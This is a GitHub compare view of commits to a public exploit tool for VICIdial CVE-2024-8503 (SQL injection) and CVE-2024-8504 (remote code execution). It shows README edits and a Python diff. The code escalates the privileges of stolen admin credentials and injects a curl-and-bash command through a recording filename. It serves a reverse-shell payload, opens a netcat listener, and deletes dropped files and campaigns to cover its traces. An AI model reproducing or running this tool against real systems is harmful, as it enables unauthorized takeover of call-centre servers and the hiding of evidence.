Compare commits

...

10 Commits

Author SHA1 Message Date
Chocapikk
eef25f93bb Cleaner bash payload 2024-09-16 01:34:05 +02:00
Chocapikk
c95803b264 Fix error in README 2024-09-16 01:28:00 +02:00
Chocapikk
6b48869dd1 Re-improve file deletion, and campaign names 2024-09-16 01:23:28 +02:00
Chocapikk
83c9bd5e9c Remove campaign ID from the payload 2024-09-16 01:13:01 +02:00
Chocapikk
1e5c4a51b3 Randomize malicious filename, improve file deletion 2024-09-16 01:10:06 +02:00
Chocapikk
be73a6415b Remove bash file 2024-09-16 00:58:10 +02:00
Chocapikk
b9f2928d49 Remove duplicate instruction 2024-09-16 00:39:01 +02:00
Chocapikk
2796df771c Always delete the campaign, regardless of success or failure 2024-09-15 23:56:36 +02:00
Chocapikk
76934c993b More stable, using IP instead of hostname, deleting campaign after exploit, and infected files. 2024-09-15 19:32:03 +02:00
Chocapikk
03693c6360 *v* 2024-09-14 10:32:26 +02:00
2 changed files with 466 additions and 366 deletions

View File

@@ -3,20 +3,20 @@
![Banner](./img/banner.png)
## 🚨 Overview
This repository contains a combined exploit for two critical vulnerabilities discovered in **VICIdial** by **KoreLogic**:
This repository contains a combined exploit for two critical vulnerabilities discovered in **[VICIdial](https://vicidial.com)** by **[KoreLogic](https://korelogic.com)**:
- **CVE-2024-8503**: Unauthenticated SQL Injection (SQLi)
- **CVE-2024-8504**: SQLi leading to Remote Code Execution (RCE)
- **CVE-2024-8504**: Authenticated Remote Code Execution (RCE)
These vulnerabilities allow an attacker to retrieve administrative credentials through SQLi and ultimately execute arbitrary code on the target server via an RCE attack.
### 🛑 Advisory:
- **Vulnerability Type**: SQL Injection (CVE-2024-8503) and SQLi to RCE (CVE-2024-8504)
- **Vulnerability Type**: SQL Injection (CVE-2024-8503) and RCE (CVE-2024-8504)
- **Affected Software**: VICIdial
- **Severity**: Critical
- **CVE IDs**:
- **CVE-2024-8503** (SQLi)
- **CVE-2024-8504** (SQLi to RCE)
- **CVE-2024-8504** (RCE)
### 🔗 Vulnerability Advisories:
- [CVE-2024-8503 - SQLi Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt)
@@ -26,7 +26,7 @@ These vulnerabilities allow an attacker to retrieve administrative credentials t
This exploit tool allows you to either:
1. **Retrieve administrator credentials via SQLi** (CVE-2024-8503)
2. **Achieve RCE via SQLi and poisoned recording files** (CVE-2024-8504)
2. **Achieve RCE via poisoned recording files** (CVE-2024-8504)
The tool is based on KoreLogics original research, with enhancements made to:
- Separate the **SQLi** and **RCE** functionalities for more flexibility.
@@ -105,7 +105,7 @@ python exploit.py -u https://example.org -wh <server IP> -wp 5000 -lh <server IP
## 📄 Acknowledgements
This exploit is based on the original work by **KoreLogic**, and full credit goes to them for the discovery and initial PoC:
This exploit is based on the original work by **[KoreLogic](https://korelogic.com)**, and full credit goes to them for the discovery and initial PoC:
- [CVE-2024-8503 - SQLi Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt)
- [CVE-2024-8504 - RCE Advisory](https://korelogic.com/Resources/Advisories/KL-001-2024-012.txt)
@@ -113,4 +113,4 @@ Special thanks to KoreLogic for the foundational work. This tool was adapted to
## 🛡️ Disclaimer
This tool is for **educational purposes** only (lol). Use of this exploit without explicit permission from the system owner is illegal. The author assumes no responsibility for the misuse of this tool.
This tool is for **educational purposes** only (lol). Use of this exploit without explicit permission from the system owner is illegal. The author assumes no responsibility for the misuse of this tool. Scambaiters, you're welcome.

View File

@@ -11,6 +11,7 @@ import rich_click as click
from faker import Faker
from base64 import b64encode
from datetime import datetime
from bs4 import BeautifulSoup
from urllib.parse import urlparse
@@ -39,7 +40,11 @@ class Exploit:
self.TARGET_URL = url
self.TARGET_IP = urlparse(url).hostname
# Resolve the domain to IP and replace in the URL
self.replace_domain_with_ip()
# Get the IP from the resolved URL
self.TARGET_IP = urlparse(self.TARGET_URL).hostname
self.PAYLOAD_WEBSERVER_HOST = whost
self.PAYLOAD_WEBSERVER_PORT = wport
@@ -55,19 +60,47 @@ class Exploit:
self.CAMPAIGN_ID = "".join(random.choices(string.digits, k=6))
self.LIST_ID = str(int(self.CAMPAIGN_ID) + 1)
self.MALICIOUS_FILENAME = "." + "".join(
random.choices(string.ascii_lowercase + string.digits, k=4)
)
self.COMPANY_NAME = (
self.fake.company()
.replace(" ", "_")
.replace("-", "_")
.replace(",", "")
.lower()
self.fake.company().title()
+ " "
+ random.choice(
[
"Dial",
"Inbound",
"Call",
"Shift",
"Support",
"Sales",
"Outbound",
"Admin",
"Helpdesk",
"Queue",
"Agent",
"Service",
"Tech",
"Monitoring",
"Operations",
"Logistics",
"Manager",
]
)
)
def custom_print(self, message: str, header: str) -> None:
"""
Prints a message with a colored header to indicate the message type.
"""
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
header_colors = {
"+": "green",
"-": "red",
"!": "yellow",
"*": "blue",
"~": "magenta",
}
header_color = header_colors.get(header, "white")
formatted_message = click.style(
f"[{header}] ", fg=header_color, bold=True
@@ -211,378 +244,440 @@ class Exploit:
# Ensure both fields are retrieved
if not mgr_login_name or not mgr_pass_name:
self.custom_print("Could not find the required dynamic fields", "-")
return None, None
self.custom_print(
"Could not find the required dynamic fields, constructing manually",
"!",
)
mgr_login_name = mgr_login_name["name"]
mgr_pass_name = mgr_pass_name["name"]
# Get today's date in the required format (YYYYMMDD)
today_date = datetime.now().strftime("%Y%m%d")
self.custom_print(
f"Retrieved dynamic field names: {mgr_login_name}, {mgr_pass_name}", "+"
)
# Manually construct the dynamic field names
mgr_login_name = f"MGR_login{today_date}"
mgr_pass_name = f"MGR_pass{today_date}"
self.custom_print(
f"Manually constructed dynamic field names: {mgr_login_name}, {mgr_pass_name}",
"+",
)
else:
mgr_login_name = mgr_login_name["name"]
mgr_pass_name = mgr_pass_name["name"]
self.custom_print(
f"Retrieved dynamic field names: {mgr_login_name}, {mgr_pass_name}",
"+",
)
return mgr_login_name, mgr_pass_name
except Exception as e:
self.custom_print(f"Error retrieving dynamic fields: {str(e)}", "-")
self.custom_print(f"An error occurred: {str(e)}", "-")
return None, None
def poison_recording_files(self, session, username, password):
# authenticate using administrator credentials
credentials = f"{username}:{password}"
credentials_base64 = b64encode(credentials.encode()).decode()
auth_header = f"Basic {credentials_base64}"
target_uri = f"{self.TARGET_URL}/vicidial/admin.php"
request_params = {"ADD": "3", "user": username}
request_headers = {**self.REQUEST_HEADERS, "Authorization": auth_header}
response = session.get(
target_uri, params=request_params, headers=request_headers
)
if response.status_code == 200:
self.custom_print(f'Authenticated successfully as user "{username}"', "+")
else:
self.custom_print(
"Failed to authenticate with credentials. Maybe hashing is enabled?",
"-",
)
return False
# update user settings to increase privileges beyond default administrator
user_settings_body = {
"ADD": "4A",
"user": username,
"DB": "0",
"pass": password,
"force_change_password": "N",
"full_name": self.fake.name(),
"user_level": "9",
"user_group": "ADMIN",
"phone_login": self.fake.user_name(),
"phone_pass": self.fake.password(),
"active": "Y",
"user_new_lead_limit": "-1",
"agent_choose_ingroups": "1",
"agent_choose_blended": "1",
"scheduled_callbacks": "1",
"vicidial_recording": "1",
"vicidial_transfers": "1",
"selected_language": "default+English",
"agent_shift_enforcement_override": "ALL",
"agent_call_log_view_override": "Y",
"hide_call_log_info": "Y",
"lead_filter_id": "NONE",
"max_inbound_filter_min_sec": "-1",
"inbound_credits": "-1",
"wrapup_seconds_override": "-1",
"ready_max_logout": "-1",
"GRADE_AGENTDIRECT": "10",
"LIMIT_AGENTDIRECT": "-1",
"GRADE_AGENTDIRECT_CHAT": "10",
"LIMIT_AGENTDIRECT_CHAT": "-1",
"qc_user_level": "1",
"view_reports": "1",
"alter_agent_interface_options": "1",
"modify_users": "1",
"change_agent_campaign": "1",
"delete_users": "1",
"modify_usergroups": "1",
"delete_user_groups": "1",
"modify_lists": "1",
"delete_lists": "1",
"load_leads": "1",
"modify_leads": "1",
"download_lists": "1",
"export_reports": "1",
"delete_from_dnc": "1",
"modify_campaigns": "1",
"campaign_detail": "1",
"modify_dial_prefix": "1",
"delete_campaigns": "1",
"modify_ingroups": "1",
"delete_ingroups": "1",
"modify_inbound_dids": "1",
"delete_inbound_dids": "1",
"modify_custom_dialplans": "1",
"modify_remoteagents": "1",
"delete_remote_agents": "1",
"modify_scripts": "1",
"delete_scripts": "1",
"modify_filters": "1",
"delete_filters": "1",
"ast_admin_access": "1",
"ast_delete_phones": "1",
"modify_call_times": "1",
"delete_call_times": "1",
"modify_servers": "1",
"modify_shifts": "1",
"modify_phones": "1",
"modify_carriers": "1",
"modify_labels": "1",
"modify_colors": "1",
"modify_statuses": "1",
"modify_voicemail": "1",
"modify_audiostore": "1",
"modify_moh": "1",
"modify_tts": "1",
"modify_contacts": "1",
"callcard_admin": "1",
"add_timeclock_log": "1",
"modify_timeclock_log": "1",
"delete_timeclock_log": "1",
"manager_shift_enforcement_override": "1",
"pause_code_approval": "1",
"vdc_agent_api_access": "1",
"api_allowed_functions%5B%5D": "ALL_FUNCTIONS",
"modify_same_user_level": "1",
"download_invalid_files": "1",
"alter_admin_interface_options": "1",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=user_settings_body
)
self.custom_print("Updated user settings to increase privileges", "+")
# update system settings without clobbering existing configuration
response = session.get(
target_uri, headers=request_headers, params={"ADD": "311111111111111"}
)
soup = BeautifulSoup(response.text, "html.parser")
form_tag = soup.find("form")
system_settings_body = {}
for input_tag in form_tag.find_all("input"):
setting_name = input_tag["name"]
setting_value = input_tag["value"]
system_settings_body[setting_name] = setting_value
for select_tag in form_tag.find_all("select"):
setting_name = select_tag["name"]
selected_tag = select_tag.find("option", selected=True)
if not selected_tag:
continue
setting_value = selected_tag.text
system_settings_body[setting_name] = setting_value
system_settings_body["outbound_autodial_active"] = "0"
response = session.post(
target_uri, headers=request_headers, data=system_settings_body
)
self.custom_print("Updated system settings", "+")
# create dummy campaign
campaign_settings_body = {
"ADD": "21",
"campaign_id": self.CAMPAIGN_ID,
"campaign_name": f"{self.COMPANY_NAME}_campaign",
"user_group": "---ALL---",
"active": "Y",
"allow_closers": "Y",
"hopper_level": "1",
"next_agent_call": "random",
"local_call_time": "12pm-5pm",
"get_call_launch": "NONE",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=campaign_settings_body
)
self.custom_print(f'Created dummy campaign "{self.COMPANY_NAME}_campaign"', "+")
# update dummy campaign
update_campaign_body = {
"ADD": "41",
"campaign_id": self.CAMPAIGN_ID,
"old_campaign_allow_inbound": "Y",
"campaign_name": f"{self.COMPANY_NAME}_campaign",
"active": "Y",
"lead_order": "DOWN",
"lead_filter_id": "NONE",
"no_hopper_leads_logins": "Y",
"hopper_level": "1",
"reset_hopper": "N",
"dial_method": "RATIO",
"auto_dial_level": "1",
"SUBMIT": "SUBMIT",
"form_end": "END",
}
response = session.post(
target_uri, headers=request_headers, data=update_campaign_body
)
self.custom_print("Updated dummy campaign settings", "+")
# create dummy list
list_settings_body = {
"ADD": "211",
"list_id": self.LIST_ID,
"list_name": f"{self.COMPANY_NAME}_list",
"campaign_id": self.CAMPAIGN_ID,
"active": "Y",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=list_settings_body
)
self.custom_print("Created dummy list for campaign", "+")
# fetch credentials for a phone login
def resolve_domain_to_ip(self, url):
"""Resolves a domain name to an IP address"""
try:
response = session.get(
target_uri, headers=request_headers, params={"ADD": "10000000000"}
)
phone_uri_path = BeautifulSoup(response.text, "html.parser").find(
"a", string="MODIFY"
)["href"]
parsed_url = urlparse(url)
domain = parsed_url.hostname
if re.match(r"\d+\.\d+\.\d+\.\d+", domain):
return domain
ip_address = socket.gethostbyname(domain)
return ip_address
except socket.gaierror as e:
raise ValueError(f"Error resolving domain: {str(e)}")
def replace_domain_with_ip(self):
"""Replaces the domain in the TARGET_URL with its resolved IP address"""
ip_address = self.resolve_domain_to_ip(self.TARGET_URL)
self.TARGET_URL = self.TARGET_URL.replace(
urlparse(self.TARGET_URL).hostname, ip_address
)
def poison_recording_files(self, session, username, password):
try:
# authenticate using administrator credentials
credentials = f"{username}:{password}"
credentials_base64 = b64encode(credentials.encode()).decode()
auth_header = f"Basic {credentials_base64}"
target_uri = f"{self.TARGET_URL}/vicidial/admin.php"
request_params = {"ADD": "3", "user": username}
request_headers = {**self.REQUEST_HEADERS, "Authorization": auth_header}
response = session.get(
f"{self.TARGET_URL}{phone_uri_path}", headers=request_headers
target_uri, params=request_params, headers=request_headers
)
if response.status_code == 200:
self.custom_print(
f'Authenticated successfully as user "{username}"', "+"
)
else:
self.custom_print(
"Failed to authenticate with credentials. Maybe hashing is enabled?",
"-",
)
return False
# update user settings to increase privileges beyond default administrator
user_settings_body = {
"ADD": "4A",
"user": username,
"DB": "0",
"pass": password,
"force_change_password": "N",
"full_name": self.fake.name(),
"user_level": "9",
"user_group": "ADMIN",
"phone_login": self.fake.user_name(),
"phone_pass": self.fake.password(),
"active": "Y",
"user_new_lead_limit": "-1",
"agent_choose_ingroups": "1",
"agent_choose_blended": "1",
"scheduled_callbacks": "1",
"vicidial_recording": "1",
"vicidial_transfers": "1",
"selected_language": "default+English",
"agent_shift_enforcement_override": "ALL",
"agent_call_log_view_override": "Y",
"hide_call_log_info": "Y",
"lead_filter_id": "NONE",
"max_inbound_filter_min_sec": "-1",
"inbound_credits": "-1",
"wrapup_seconds_override": "-1",
"ready_max_logout": "-1",
"GRADE_AGENTDIRECT": "10",
"LIMIT_AGENTDIRECT": "-1",
"GRADE_AGENTDIRECT_CHAT": "10",
"LIMIT_AGENTDIRECT_CHAT": "-1",
"qc_user_level": "1",
"view_reports": "1",
"alter_agent_interface_options": "1",
"modify_users": "1",
"change_agent_campaign": "1",
"delete_users": "1",
"modify_usergroups": "1",
"delete_user_groups": "1",
"modify_lists": "1",
"delete_lists": "1",
"load_leads": "1",
"modify_leads": "1",
"download_lists": "1",
"export_reports": "1",
"delete_from_dnc": "1",
"modify_campaigns": "1",
"campaign_detail": "1",
"modify_dial_prefix": "1",
"delete_campaigns": "1",
"modify_ingroups": "1",
"delete_ingroups": "1",
"modify_inbound_dids": "1",
"delete_inbound_dids": "1",
"modify_custom_dialplans": "1",
"modify_remoteagents": "1",
"delete_remote_agents": "1",
"modify_scripts": "1",
"delete_scripts": "1",
"modify_filters": "1",
"delete_filters": "1",
"ast_admin_access": "1",
"ast_delete_phones": "1",
"modify_call_times": "1",
"delete_call_times": "1",
"modify_servers": "1",
"modify_shifts": "1",
"modify_phones": "1",
"modify_carriers": "1",
"modify_labels": "1",
"modify_colors": "1",
"modify_statuses": "1",
"modify_voicemail": "1",
"modify_audiostore": "1",
"modify_moh": "1",
"modify_tts": "1",
"modify_contacts": "1",
"callcard_admin": "1",
"add_timeclock_log": "1",
"modify_timeclock_log": "1",
"delete_timeclock_log": "1",
"manager_shift_enforcement_override": "1",
"pause_code_approval": "1",
"vdc_agent_api_access": "1",
"api_allowed_functions%5B%5D": "ALL_FUNCTIONS",
"modify_same_user_level": "1",
"download_invalid_files": "1",
"alter_admin_interface_options": "1",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=user_settings_body
)
self.custom_print("Updated user settings to increase privileges", "+")
# update system settings without clobbering existing configuration
response = session.get(
target_uri, headers=request_headers, params={"ADD": "311111111111111"}
)
soup = BeautifulSoup(response.text, "html.parser")
form_tag = soup.find("form")
system_settings_body = {}
for input_tag in form_tag.find_all("input"):
setting_name = input_tag["name"]
setting_value = input_tag["value"]
system_settings_body[setting_name] = setting_value
phone_extension = soup.find("input", {"name": "extension"})["value"]
phone_password = soup.find("input", {"name": "pass"})["value"]
recording_extension = soup.find("input", {"name": "recording_exten"})[
"value"
]
for select_tag in form_tag.find_all("select"):
setting_name = select_tag["name"]
selected_tag = select_tag.find("option", selected=True)
if not selected_tag:
continue
setting_value = selected_tag.text
system_settings_body[setting_name] = setting_value
self.custom_print(
f"Found phone credentials: {phone_extension}:{phone_password}", "+"
)
except Exception as e:
self.custom_print(f"Error retrieving phone credentials: {str(e)}", "-")
return False
# authenticate to agent portal with phone credentials
mgr_login_name, mgr_pass_name = self.get_dynamic_fields(
session, username, password
)
if not all([mgr_login_name, mgr_pass_name]):
return False
# authenticate to agent portal with phone credentials
manager_login_body = {
"DB": "0",
"JS_browser_height": "1313",
"JS_browser_width": "2560",
"phone_login": phone_extension,
"phone_pass": phone_password,
"VD_login": username,
"VD_pass": password,
"MGR_override": "1",
"relogin": "YES",
"VD_login": username,
"VD_pass": password,
mgr_login_name: username,
mgr_pass_name: password,
"SUBMIT": "SUBMIT",
}
response = session.post(
f"{self.TARGET_URL}/agc/vicidial.php",
headers=request_headers,
data=manager_login_body,
)
self.custom_print(
f'Entered "manager" credentials to override shift enforcement', "+"
)
agent_login_body = {
"DB": "0",
"JS_browser_height": "1313",
"JS_browser_width": "2560",
"phone_login": phone_extension,
"phone_pass": phone_password,
"VD_login": username,
"VD_pass": password,
"VD_campaign": self.CAMPAIGN_ID,
}
response = session.post(
f"{self.TARGET_URL}/agc/vicidial.php",
headers=request_headers,
data=agent_login_body,
)
self.custom_print(f"Authenticated as agent using phone credentials", "+")
try:
session_name = re.findall(
r"var session_name = '([a-zA-Z0-9_]+?)';", response.text
)[0]
session_id = re.findall(r"var session_id = '([0-9]+?)';", response.text)[0]
self.custom_print(
f"Session Name: {session_name}, Session ID: {session_id}", "+"
)
malicious_filename = f"{self.CAMPAIGN_ID}1337$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS.c&&bash$IFS.c)"
except Exception as e:
self.custom_print(
f"Error retrieving session_name or session_id: {str(e)}", "-"
)
return False
malicious_filename = f"{self.CAMPAIGN_ID}1337$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS.c&&bash$IFS.c)"
record1_body = {
"server_ip": self.TARGET_IP,
"session_name": session_name,
"user": username,
"pass": password,
"ACTION": "MonitorConf",
"format": "text",
"channel": f"Local/{recording_extension}@default",
"filename": malicious_filename,
"exten": recording_extension,
"ext_context": "default",
"ext_priority": "1",
"FROMvdc": "YES",
}
try:
system_settings_body["outbound_autodial_active"] = "0"
response = session.post(
f"{self.TARGET_URL}/agc/manager_send.php",
target_uri, headers=request_headers, data=system_settings_body
)
self.custom_print("Updated system settings", "+")
# create dummy campaign
campaign_settings_body = {
"ADD": "21",
"campaign_id": self.CAMPAIGN_ID,
"campaign_name": f"{self.COMPANY_NAME}",
"user_group": "---ALL---",
"active": "Y",
"allow_closers": "Y",
"hopper_level": "1",
"next_agent_call": "random",
"local_call_time": "12am-11pm",
"get_call_launch": "NONE",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=campaign_settings_body
)
self.custom_print(f'Created dummy campaign "{self.COMPANY_NAME}"', "+")
# update dummy campaign
update_campaign_body = {
"ADD": "41",
"campaign_id": self.CAMPAIGN_ID,
"old_campaign_allow_inbound": "Y",
"campaign_name": f"{self.COMPANY_NAME}",
"active": "Y",
"lead_order": "DOWN",
"lead_filter_id": "NONE",
"no_hopper_leads_logins": "Y",
"hopper_level": "1",
"reset_hopper": "N",
"dial_method": "RATIO",
"auto_dial_level": "1",
"SUBMIT": "SUBMIT",
"form_end": "END",
}
response = session.post(
target_uri, headers=request_headers, data=update_campaign_body
)
self.custom_print("Updated dummy campaign settings", "+")
# create dummy list
list_settings_body = {
"ADD": "211",
"list_id": self.LIST_ID,
"list_name": f"{self.COMPANY_NAME}_list",
"campaign_id": self.CAMPAIGN_ID,
"active": "Y",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=list_settings_body
)
self.custom_print("Created dummy list for campaign", "+")
# fetch credentials for a phone login
try:
response = session.get(
target_uri, headers=request_headers, params={"ADD": "10000000000"}
)
phone_uri_path = BeautifulSoup(response.text, "html.parser").find(
"a", string="MODIFY"
)["href"]
response = session.get(
f"{self.TARGET_URL}{phone_uri_path}", headers=request_headers
)
soup = BeautifulSoup(response.text, "html.parser")
phone_extension = soup.find("input", {"name": "extension"})["value"]
phone_password = soup.find("input", {"name": "pass"})["value"]
recording_extension = soup.find("input", {"name": "recording_exten"})[
"value"
]
self.custom_print(
f"Found phone credentials: {phone_extension}:{phone_password}", "+"
)
except Exception as e:
self.custom_print(f"Error retrieving phone credentials: {str(e)}", "-")
return False
# authenticate to agent portal with phone credentials
mgr_login_name, mgr_pass_name = self.get_dynamic_fields(
session, username, password
)
if not all([mgr_login_name, mgr_pass_name]):
return False
# authenticate to agent portal with phone credentials
manager_login_body = {
"DB": "0",
"JS_browser_height": "1313",
"JS_browser_width": "2560",
"phone_login": phone_extension,
"phone_pass": phone_password,
"VD_login": username,
"VD_pass": password,
"MGR_override": "1",
"relogin": "YES",
"VD_login": username,
"VD_pass": password,
mgr_login_name: username,
mgr_pass_name: password,
"SUBMIT": "SUBMIT",
}
response = session.post(
f"{self.TARGET_URL}/agc/vicidial.php",
headers=request_headers,
data=record1_body,
data=manager_login_body,
)
recording_id_match = re.findall(r"RecorDing_ID: ([0-9]+)", response.text)
print(response.text)
if not recording_id_match:
raise ValueError("Failed to retrieve RecorDing_ID from the response.")
recording_id = recording_id_match[0]
self.custom_print(
f"Recording ID: {recording_id} retrieved successfully", "+"
f'Entered "manager" credentials to override shift enforcement', "+"
)
agent_login_body = {
"DB": "0",
"JS_browser_height": "1313",
"JS_browser_width": "2560",
"phone_login": phone_extension,
"phone_pass": phone_password,
"VD_login": username,
"VD_pass": password,
"VD_campaign": self.CAMPAIGN_ID,
}
response = session.post(
f"{self.TARGET_URL}/agc/vicidial.php",
headers=request_headers,
data=agent_login_body,
)
self.custom_print(f"Authenticated as agent using phone credentials", "+")
try:
malicious_filename = f"$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
session_name = re.findall(
r"var session_name = '([a-zA-Z0-9_]+?)';", response.text
)[0]
session_id = re.findall(
r"var session_id = '([0-9]+?)';", response.text
)[0]
self.custom_print(
f"Session Name: {session_name}, Session ID: {session_id}", "+"
)
except Exception as e:
self.custom_print(
f"Error retrieving session_name or session_id: {str(e)}", "-"
)
return False
record1_body = {
"server_ip": self.TARGET_IP,
"session_name": session_name,
"user": username,
"pass": password,
"ACTION": "MonitorConf",
"format": "text",
"channel": f"Local/{recording_extension}@default",
"filename": malicious_filename,
"exten": recording_extension,
"ext_context": "default",
"ext_priority": "1",
"FROMvdc": "YES",
}
try:
response = session.post(
f"{self.TARGET_URL}/agc/manager_send.php",
headers=request_headers,
data=record1_body,
)
recording_id_match = re.findall(
r"RecorDing_ID: ([0-9]+)", response.text
)
if not recording_id_match:
raise ValueError(
"Failed to retrieve RecorDing_ID from the response."
)
recording_id = recording_id_match[0]
self.custom_print(
f"Recording ID: {recording_id} retrieved successfully", "+"
)
self.custom_print(response.text, "~")
except Exception as e:
self.custom_print(f"Error retrieving RecorDing_ID: {str(e)}", "-")
return False
# stop malicious recording to prevent file size from growing
record2_body = {
"server_ip": self.TARGET_IP,
"session_name": session_name,
"user": username,
"pass": password,
"ACTION": "StopMonitorConf",
"format": "text",
"channel": f"Local/{recording_extension}@default",
"filename": f"ID:{recording_id}",
"exten": session_id,
"ext_context": "default",
"ext_priority": "1",
"FROMvdc": "YES",
}
response = session.post(
f"{self.TARGET_URL}/agc/conf_exten_check.php",
headers=request_headers,
data=record2_body,
)
return True
except Exception as e:
self.custom_print(f"Error retrieving RecorDing_ID: {str(e)}", "-")
return False
self.custom_print(f"An error occurred during exploitation: {str(e)}", "-")
# stop malicious recording to prevent file size from growing
record2_body = {
"server_ip": self.TARGET_IP,
"session_name": session_name,
"user": username,
"pass": password,
"ACTION": "StopMonitorConf",
"format": "text",
"channel": f"Local/{recording_extension}@default",
"filename": f"ID:{recording_id}",
"exten": session_id,
"ext_context": "default",
"ext_priority": "1",
"FROMvdc": "YES",
}
response = session.post(
f"{self.TARGET_URL}/agc/conf_exten_check.php",
headers=request_headers,
data=record2_body,
)
return True
finally:
# Always delete the campaign, regardless of success or failure
self.custom_print(
f"Deleting campaign '{self.COMPANY_NAME}' with ID {self.CAMPAIGN_ID}",
"*",
)
try:
session.get(
f"{self.TARGET_URL}/vicidial/admin.php?ADD=61&campaign_id={self.CAMPAIGN_ID}&CoNfIrM=YES",
headers=request_headers,
)
self.custom_print("Campaign deleted successfully.", "+")
except Exception as delete_exception:
self.custom_print(
f"Failed to delete campaign: {str(delete_exception)}", "-"
)
# returns administrator username and password by
# exploiting time-based SQL injection.
@@ -629,9 +724,15 @@ class Exploit:
self.custom_print(
f"Received cURL request from {incoming_address[0]}", "+"
)
exploit_script = f"#!/bin/bash\nbash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1"
exploit_script = (
f"#!/bin/bash\n"
f"rm {self.MALICIOUS_FILENAME} /var/spool/asterisk/monitor/*curl*\n"
f"bash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1\n"
)
http_response = f"HTTP/1.1 200 OK\r\n"
http_response += f"Content-Length: {len(exploit_script)}\r\n\r\n"
http_response += exploit_script
client.sendall(http_response.encode())
@@ -642,7 +743,6 @@ class Exploit:
self.custom_print(f"Error in webserver: {str(e)}", "-")
def start_listener(self):
"""Démarre un listener Netcat pour capturer le reverse shell."""
try:
self.custom_print(
f"Starting Netcat listener on port {self.REVERSE_SHELL_PORT}", "*"
@@ -710,7 +810,7 @@ def print_banner():
if __name__ == "__main__":
print_banner()
argparser = argparse.ArgumentParser(
description="Exploit for CVE-2024-XXXXX: Unauthenticated SQLi to retrieve credentials or RCE as root"
description="Exploit for CVE-2024-8504: Unauthenticated SQLi to retrieve credentials or RCE as root"
)
required = argparser.add_argument_group("Required Arguments")
optional = argparser.add_argument_group("Optional Arguments")